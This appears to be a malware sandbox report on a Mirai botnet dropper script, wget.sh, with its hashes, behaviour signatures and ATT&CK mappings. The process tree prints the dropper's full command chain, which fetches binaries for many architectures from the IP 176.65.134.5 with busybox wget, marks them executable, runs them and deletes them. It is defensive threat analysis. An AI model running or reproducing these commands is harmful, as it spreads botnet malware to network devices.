Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
07/03/2025, 00:21
General
-
Target
wget.sh
-
Size
1KB
-
MD5
a9f753da46e0678e9652f1417378e79a
-
SHA1
19bf100cae7a6a8fa9a42d0368ff1918c9b796ac
-
SHA256
51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a
-
SHA512
3969653a243f80154bbca0045c35e3e8e0b47fdc85bcc13c8887c24e2c207dfd92e3265393ea7d8a28347c67d69501a0d7a2aa2247e116a0705d33731bdce636
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
Contacts a large (177881) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 3 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Renames itself 2 IoCs
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 31 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 2 IoCs
-
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Executes dropped EXE
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm -O jklarm2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm./jklarm exploit2⤵
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm5./jklarm5 exploit2⤵
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm6./jklarm6 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm72⤵
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm7./jklarm7 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklm68k./jklm68k exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmips -O jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmips./jklmips exploit2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmpsl./jklmpsl exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklppc -O jklppc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklppc./jklppc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh42⤵
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
-
-
/tmp/jklsh4./jklsh4 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklspc -O jklspc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklspc./jklspc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklx86 -O jklx862⤵
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
-
-
/tmp/jklx86./jklx86 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarc -O jklarc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarc./jklarc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
55KB
MD5a2e0300a38d49740dd9af7820f2e2b6b
SHA182fc641a38383412bb88dd5cdb83d45a8315daa5
SHA256fc96aa360ca3f3318444f338f9131a9a43c00beb3e812e639cfe80f07219c9a7
SHA512cc4906d1088a9191ade954aa1637ade08e6e7278bb4b541a0af0549bb876b3adcb7ba5cc94acf3e455d1e65e5f6afce36b1556129b95a53392aae72112f3bfa6
-
Filesize
55KB
MD56808c976ae3e0456efb6e6fc4e1a8423
SHA1d9b7a61a16aa0e2875b04ff7eac22e72fc15a24e
SHA256270336c1d58b1ffaa8ebba18d47d73c2451fa149194f37cc44e980ac96cf1443
SHA5128b890a0f2d216b8041577412b2d7d4f9524caf0d185f45d48ce7df781fce05e0148e3f767dfc6bb76931a9237e6a26b80decae63a7685760727a8b9716855917
-
Filesize
65KB
MD52c56a6803c9b541e037c5501da6def2f
SHA15b5787622aa43f619ecd49c1659f769f9bb812cc
SHA256906399d69e39253d0551c6bf9c59451b2ee12e5e7e8ac557040b38c6b813e711
SHA512b799bea5f2a69cf97abe1a5b6acb64f4488430a06555ae511a2e0f2e8177ae4c021560914544fd8fbb4a1490f7a686cee8be78c1bd2830305b8d780f79a8e109